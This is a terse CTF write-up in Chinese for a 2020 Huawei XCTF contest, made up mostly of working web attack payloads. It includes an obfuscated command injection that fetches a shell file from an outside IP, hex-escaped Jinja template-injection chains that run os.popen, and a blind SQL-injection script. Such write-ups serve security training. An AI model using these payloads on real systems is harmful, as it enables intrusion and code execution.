CTF

华为XCTF高校网络安全专题挑战赛

Posted on 2020-12-20,4 min read

hids

cd$IFS$(printf$IFS$9$(find))$(printf$IFS$9$(find));cd$IFS$(printf$IFS$9$(find))$(printf$IFS$9$(find));$(printf$IFS"p")ython3$IFS$(printf$IFS"\055")c$IFS"$(printf$IFS$IFS"
\160\162\151\156\164\050\137\137\151\155\160\157\162\164\137\137\050\042\157\163\042\051\056\160\157\160\145\156\050\042\143\165\162\154\040\061\061\071\056\064\065\056\061\065\065\056\067\067\057\163\150\145\154\154\056\150\164\155\154\040\076\040\057\164\155\160\057\147\147\147\147\147\147\147\042\051\056\162\145\141\144\050\051\051
")"
用python执行代码。写反弹shell的文件到tmp。根目录detect.py可写。直接清空。。这应该是非预期吧。然后反弹shell。执行/readflag

cd$IFS$9$(printf$IFS$9$(find))$(printf$IFS$9$(find));cd$IFS$9$(printf$IFS$9$(find))$(printf$IFS$9$(find));cat$IFS$9readflag

mine2

attr配合{%%}一把梭

view-source:http://121.37.187.239:30577/success?msg={%print(())|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f")|attr("\x5f\x5f\x62\x61\x73\x65\x5f\x5f")|attr("\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f")()|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")(65)|attr("\x5F\x5F\x69\x6E\x69\x74\x5F\x5F")|attr("\x5F\x5F\x67\x6C\x6F\x62\x61\x6C\x73\x5F\x5F")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("\x5F\x5F\x62\x75\x69\x6C\x74\x69\x6E\x73\x5F\x5F")|attr("\x5f\x5f\x67\x65\x74\x69\x74\x65\x6d\x5f\x5f")("eval")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x74\x78\x74\x20\x27\x29\x2e\x72\x65\x61\x64\x28\x29")%}

mine1_1

attr配合request.cookies绕

webshell_1

上传jsp

pyer

import requests,string
url="http://121.37.187.239:31763/login"

#s=' ,()"abcdefghijkmnlopqrstuvwxyABCDEFGHIJKMNLOPQRSTUWVYXZ0123456789'
s=string.printable
for i in range(1,255):
    for st in s:
        #data={"username":"123a' union select substr((select sql from sqlite_master where type='table' and tbl_name='users'),"+str(i)+",1)-- ","password":st}
        data = {
            "username": "123a' union select substr((select password from users)," + str(
                i) + ",1)-- ", "password": st}
        result=requests.post(url=url,data=data, allow_redirects=False)
        #print(data)

        if(result.status_code==302):
            print(st,end='')
            break
        else:
            pass

注入拿到密码。后台模板注入

POST /admin HTTP/1.1
Host: 121.37.187.239:31763
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://121.37.187.239:31763/admin
Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ.X98p-g.mXdGzy6rpWkjiGpesQPbIKZucDk
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

username=' union select '{{lipsum.__globals__["__builtins__"]["eval"]("__import__(\"os\").popen(\"cat app.py\").read()")}}'--&submit=%E7%99%BB%E9%99%86

下一篇: SIYUCMS后台模板注入分析→